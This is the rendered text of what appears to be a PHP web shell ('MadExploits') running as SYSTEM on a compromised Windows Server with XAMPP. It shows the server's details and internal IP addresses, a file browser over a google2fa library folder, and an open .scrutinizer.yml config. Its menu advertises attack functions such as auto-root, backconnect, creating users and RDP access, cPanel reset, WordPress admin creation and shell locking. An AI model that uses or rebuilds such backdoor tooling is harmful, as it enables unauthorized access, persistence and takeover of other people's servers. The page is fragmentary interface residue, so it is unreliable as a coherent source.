Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
vendor /
pragmarx /
google2fa /
[ HOME SHELL ]
Name
Size
Permission
Action
docs
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.scrutinizer.yml
946
B
-rw-rw-rw-
.travis.yml
698
B
-rw-rw-rw-
CHANGELOG.md
2.31
KB
-rw-rw-rw-
LICENSE.md
1.07
KB
-rw-rw-rw-
README.md
12.15
KB
-rw-rw-rw-
RELICENSED.md
1.14
KB
-rw-rw-rw-
composer.json
1.04
KB
-rw-rw-rw-
composer.lock
60.26
KB
-rw-rw-rw-
phpunit.xml
1.13
KB
-rw-rw-rw-
upgrading.md
13
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .scrutinizer.yml
checks: php: remove_extra_empty_lines: true remove_php_closing_tag: true remove_trailing_whitespace: true fix_use_statements: remove_unused: true preserve_multiple: false preserve_blanklines: true order_alphabetically: true fix_php_opening_tag: true fix_linefeed: true fix_line_ending: true fix_identation_4spaces: true fix_doc_comments: true filter: paths: [src/*] excluded_paths: [tests/*] coding_style: php: { } build: tests: override: - command: 'vendor/bin/phpunit -c phpunit.xml' coverage: file: 'coverage/coverage-clover.xml' format: 'clover' nodes: analysis: tests: override: - php-scrutinizer-run tests: true tools: external_code_coverage: true
Close